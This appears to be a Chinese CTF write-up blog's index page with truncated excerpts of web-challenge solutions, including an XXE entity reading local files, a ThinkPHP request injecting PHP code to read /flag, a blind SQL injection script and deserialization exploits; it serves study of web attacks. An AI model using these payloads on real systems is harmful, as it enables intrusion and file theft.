CTF WP

绿城杯 - ezjava SQL注入 这题属于是调一天 前台SQL注入 直接sqlmap跑就可以了 能拿到密码 admin ZM3vFeqaAI7LbIbx xxe读文件 登录后后台xxe把数据带出来 <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:////usr/local...

发布 0 条评论

WEB easythinkphp GET /index.php?m=--><?=file_get_contents('/flag');?> HTTP/1.1 Host: eee6bf45-c507-4650-8b17-d4225e2d80ee.node4.buuoj.cn Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Req...

发布 0 条评论

BabyCat 主页有个register和login。看JS。构造 /login data={"username":"test","password":"test"} 不能登陆。用同样的参数去register。可以注册用户。 然后登陆 登陆后有个download接口。 ...

发布 1 条评论

Hard_APT_jeesite 题目很明显,就是个jeesite1.2.7,从github可以拿到相应源码,因为题目描述中重点说了需要shiro的配置文件,所以我们主要关注源码中文件读取的部分。 方法1 可以首先查看web.xml的路由 主要关注到这个路由,跟进方...

发布 0 条评论

前言 总体来说,体验一般,web很套娃。没啥意思 sql 简单盲注 import requests as req import time def ord2hex(string): result = '' for i in string: result += hex(ord(i)) result = result.replace('0x...

发布 2 条评论

Thinkphp 5.0.24反序列化文件写 学了也快一年了 头一次去审计经典的框架洞。(反序列化其实一直不是很熟,所以借这次机会希望能更多的增长知识) 其实网上的链子已经非常多了 呜呜 我真的菜 环境搭建 compose一把索 然后发现./think不能...

发布 0 条评论

此内容受密码保护。如需查阅,请在下列字段中输入您的密码。

发布 0 条评论

WEB power_cut index.php.swp 备份拿到源码 <?php class logger{ public $logFile; public $initMsg; public $exitMsg; function __construct($file){ // initialise variables $this->initMsg...

发布 0 条评论

蓝帽杯_one_Pointer_php 前言 做了下蓝帽杯的web题 一共两个 这个题质量很高 可以引申出许多新知识 解题 第一层 给了源码 <?php highlight_file(__FILE__); include "user.php"; if($user=unserialize($_COOKIE["da...

发布 6 条评论